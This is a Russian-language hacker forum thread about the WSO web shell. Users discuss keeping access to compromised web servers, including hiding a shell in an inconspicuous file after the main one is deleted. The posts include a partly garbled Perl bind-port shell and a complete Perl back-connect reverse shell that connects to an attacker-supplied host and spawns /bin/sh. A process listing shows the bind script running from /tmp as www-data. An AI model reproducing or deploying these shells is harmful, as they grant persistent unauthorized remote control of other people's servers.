В всо реализован встроенный биндпорт и бэк коннект.


www-data 12657 0.0 0.0 21128 2564 ? S Aug28 0:00 perl /tmp/bp.pl 31337
www-data 28492 0.0 0.0 3956 580 ? S 04:01 0:00 sh -c ps aux | grep bp.pl
www-data 28494 0.0 0.0 3956 312 ? D 04:01 0:00 sh -c ps aux | grep bp.pl


Тоесть в темпе создается перловый скрипт, биндится порт и скрипт сносится, так?

Как вырезать эту штуку из всо для отдельного использования?

Например спалили шелл, удалили. А в какой-то неприметный файлик можно воткнуть этот скрипт.

Спасибо.

биндпорт


Code:
#!/usr/bin/perl

$SHELL="/bin/sh -i";

if (@ARGV &CONN";

open STDERR,">&CONN";

exec $SHELL || die print CONN "Cant execute $SHELL\n";

close CONN;


exit 0;

}

}

бек.


Code:
#!/usr/bin/perl

use Socket;

$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");

$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system('/bin/sh -i');

close(STDIN);

close(STDOUT);

close(STDERR);

посмотрели бы исходники WSO, тела скриптов лежат внутри переменной, кодированные в base64

есть серв с забинденным портом , выбераю telnet , подключаюсь норм, но не выполняются команды , и не выводится результат что делать? был вариант искать рутнутый ssh Но так как нет в наличии таких, отпадает вариант, что посоветуете?